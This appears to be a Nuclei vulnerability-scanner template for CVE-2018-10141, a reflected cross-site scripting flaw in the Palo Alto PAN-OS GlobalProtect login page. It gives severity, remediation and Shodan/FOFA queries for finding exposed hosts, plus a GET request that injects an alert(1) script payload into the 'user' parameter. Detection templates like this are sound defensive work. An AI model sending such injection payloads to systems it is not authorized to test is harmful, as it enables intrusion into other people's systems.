id: CVE-2018-10141 info: name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: - https://security.paloaltonetworks.com/CVE-2018-10141 - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 epss-percentile: 0.47275 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os shodan-query: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x' matchers-condition: and matchers: - type: word part: body words: - 'var valueUser = "j";-alert(1)-"x";' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100d08aac5132c6f1ecd5ed168ffed4a16fc09da3e88e4ba23e2ba67ceb409a0d9f02203f9845352398faae5c089124e2aef8dc7eec2b7c1e7af04bd29668b974a4b949:922c64590222798bb761d5b6d8e72950